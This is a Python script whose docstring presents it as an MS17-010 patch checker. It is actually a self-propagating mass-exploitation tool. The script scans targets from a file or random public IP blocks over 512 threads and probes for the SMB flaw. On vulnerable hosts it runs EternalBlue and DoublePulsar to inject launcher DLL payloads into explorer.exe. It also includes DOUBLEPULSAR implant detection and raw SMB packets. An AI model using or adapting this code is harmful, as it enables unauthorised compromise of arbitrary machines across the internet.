- from impacket import smb, ntlm, smbconnection, nt_errors
- from impacket.uuid import uuidtup_to_bin
- import socket
- from mysmb import MYSMB
- from impacket import smb
- from struct import pack, unpack
- import socket
- import time
- import threading
- import random
- import binascii
- import itertools
- import os
- '''
- Script for
- - check target if MS17-010 is patched or not.
- - find accessible named pipe
- '''
- USERNAME = ''
- PASSWORD = ''
- NDR64Syntax = ('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')
- MSRPC_UUID_BROWSER = uuidtup_to_bin(('6BFFD098-A112-3610-9833-012892020162','0.0'))
- MSRPC_UUID_SPOOLSS = uuidtup_to_bin(('12345678-1234-ABCD-EF00-0123456789AB','1.0'))
- MSRPC_UUID_NETLOGON = uuidtup_to_bin(('12345678-1234-ABCD-EF00-01234567CFFB','1.0'))
- MSRPC_UUID_LSARPC = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
- MSRPC_UUID_SAMR = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AC','1.0'))
- pipes = {
- 'browser' : MSRPC_UUID_BROWSER,
- 'spoolss' : MSRPC_UUID_SPOOLSS,
- 'netlogon' : MSRPC_UUID_NETLOGON,
- 'lsarpc' : MSRPC_UUID_LSARPC,
- 'samr' : MSRPC_UUID_SAMR,
- }
- def check(target):
- conn = MYSMB(target)
- try:
- conn.login(USERNAME, PASSWORD)
- except smb.SessionError as e:
- print('[-] Login failed: ' + nt_errors.ERROR_MESSAGES[e.error_code][0])
- return False
- finally:
- print('[.] Target OS: ' + conn.get_server_os())
- tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
- conn.set_default_tid(tid)
- # test if target is vulnerable
- TRANS_PEEK_NMPIPE = 0x23
- recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
- status = recvPkt.getNTStatus()
- if status == 0xC0000205: # STATUS_INSUFF_SERVER_RESOURCES
- print('[+] The target is not patched!')
- return True
- else:
- print('[-] The target is patched.')
- # Packets
- negotiate_protocol_request = binascii.unhexlify("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
- session_setup_request = binascii.unhexlify("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
- tree_connect_request = binascii.unhexlify("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
- trans2_session_setup = binascii.unhexlify("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
- def calculate_doublepulsar_xor_key(s):
- # Derive the 32-bit XOR key from the 64-bit value unpacked ('<Q') out of the
- # SMB signature field of a Trans2 SESSION_SETUP response; the caller only
- # reports it as a detection artefact. Note operator precedence: '*' binds
- # tighter than '^', so this is (2 * s) ^ (byte-shuffled form of s).
- x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
- x = x & 0xffffffff # this line was added just to truncate to 32 bits
- return x
- # The arch is adjacent to the XOR key in the SMB signature
- def calculate_doublepulsar_arch(s):
- # Classify by whether the upper 32 bits of the 64-bit signature value are
- # all zero. The two label strings are compared verbatim by callers, so they
- # must stay byte-identical.
- if s & 0xffffffff00000000 == 0:
- return "x86 (32-bit)"
- else:
- return "x64 (64-bit)"
- def print_status(ip, message):
- global print_lock
- with print_lock:
- print "[*] [%s] %s" % (ip, message)
- def check_ip(ip):
- global negotiate_protocol_request, session_setup_request, tree_connect_request, trans2_session_setup, timeout, verbose
- # Connect to socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(5)
- host = ip
- port = 445
- s.connect((host, port))
- # Send/receive negotiate protocol request
- s.send(negotiate_protocol_request)
- s.recv(1024)
- # Send/receive session setup request
- s.send(session_setup_request)
- session_setup_response = s.recv(1024)
- # Extract user ID from session setup response
- user_id = session_setup_response[32:34]
- # Replace user ID in tree connect request packet
- modified_tree_connect_request = list(tree_connect_request)
- modified_tree_connect_request[32] = user_id[0]
- modified_tree_connect_request[33] = user_id[1]
- modified_tree_connect_request = "".join(modified_tree_connect_request)
- # Send tree connect request
- s.send(modified_tree_connect_request)
- tree_connect_response = s.recv(1024)
- # Extract tree ID from response
- tree_id = tree_connect_response[28:30]
- # Replace tree ID and user ID in trans2 session setup packet
- modified_trans2_session_setup = list(trans2_session_setup)
- modified_trans2_session_setup[28] = tree_id[0]
- modified_trans2_session_setup[29] = tree_id[1]
- modified_trans2_session_setup[32] = user_id[0]
- modified_trans2_session_setup[33] = user_id[1]
- modified_trans2_session_setup = "".join(modified_trans2_session_setup)
- s.send(modified_trans2_session_setup)
- final_response = s.recv(1024)
- s.close()
- # Check for 0x51 response to indicate DOUBLEPULSAR infection
- if final_response[34] == "\x51":
- signature = final_response[18:26]
- signature_long = unpack('<Q', signature)[0]
- key = calculate_doublepulsar_xor_key(signature_long)
- arch = calculate_doublepulsar_arch(signature_long)
- print "[+] [%s] DOUBLEPULSAR SMB IMPLANT DETECTED!!! Arch: %s, XOR Key: %s" % (ip, arch, hex(key))
- return arch
- else:
- return False
- def exploit(IP):
- print os.popen("Eternalblue-2.2.0.exe --TargetIp " + IP).read()
- arch = check_ip(IP)
- if arch == "x86 (32-bit)":
- print os.popen("Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x86.dll --ProcessName explorer.exe").read()
- elif arch == "x64 (64-bit)":
- print os.popen("Doublepulsar-1.3.1.exe --TargetIp " + IP + " --Function RunDll --DllPayload launcher.x64.dll --ProcessName explorer.exe").read()
- def gen_IP_block():
- not_valid = [10,127,169,172,192]
- first = random.randrange(1,256)
- while first in not_valid:
- first = random.randrange(1,256)
- ip = ".".join([str(first),str(random.randrange(1,256)),
- str(random.randrange(1,256))])
- return ip+".1-255"
- def ip_range(input_string):
- octets = input_string.split('.')
- chunks = [map(int, octet.split('-')) for octet in octets]
- ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
- for address in itertools.product(*ranges):
- yield '.'.join(map(str, address))
- def Scan(IP):
- try:
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(0.50)
- s.connect((IP, 445))
- s.close()
- if check(IP):
- exploit(IP)
- except Exception as e:
- pass
- def HaxThread():
- while 1:
- for IP in ip_range(gen_IP_block()):
- Scan(IP)
- def checklist(chunk):
- # for ipblock in chunk:
- # for host in ip_range(ipblock):
- for host in chunk:
- Scan(host)
- threads = 512
- lines = open("smb.txt","r").read().split("\n")
- random.shuffle(lines)
- def chunkify(lst,n):
- return [ lst[i::n] for i in xrange(n) ]
- chunks = chunkify(lines, threads) # make seperate chunk for each thread
- for thread in xrange(0,threads):
- if thread >= 384:
- time.sleep(0.2)
- try:
- threading.Thread(target = checklist, args = (chunks[thread],)).start()
- except:
- pass
- print "Scanning... Press enter 3 times to stop."
- for i in range(0,3):
- raw_input()
- os.popen("taskkill /f /pid " + str(os.getpid()))
- """
- hosts=''''''.split("\n")
- random.shuffle(hosts)
- for IP in hosts:
- try:
- threading.Thread(target=Scan, args=(IP,)).start()
- except:
- time.sleep(10)
- try:
- threading.Thread(target=Scan, args=(IP,)).start()
- except:
- pass
- pass
- """